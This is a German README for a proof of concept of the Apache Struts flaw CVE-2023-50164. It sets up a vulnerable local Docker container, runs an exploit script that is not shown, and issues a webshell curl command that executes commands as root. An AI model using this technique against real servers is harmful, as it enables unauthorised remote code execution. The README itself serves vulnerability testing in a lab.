
CVE-2023-50164 (Apache Struts Path-Traversal-zu-RCE-Schwachstelle) – Proof of Concept
Dieses PoC wurde erstellt, um eine RCE (Remote Code Execution) durch die Ausnutzung der Apache-Struts2-Schwachstelle zu testen.

Erstellen Sie das Image und starten Sie einen Container:
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
Führen Sie den Exploit aus:
$ cd exploit
$ ./exploit.sh
Jetzt können Sie beliebige Befehle auf der Serverseite ausführen, wie gezeigt:
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)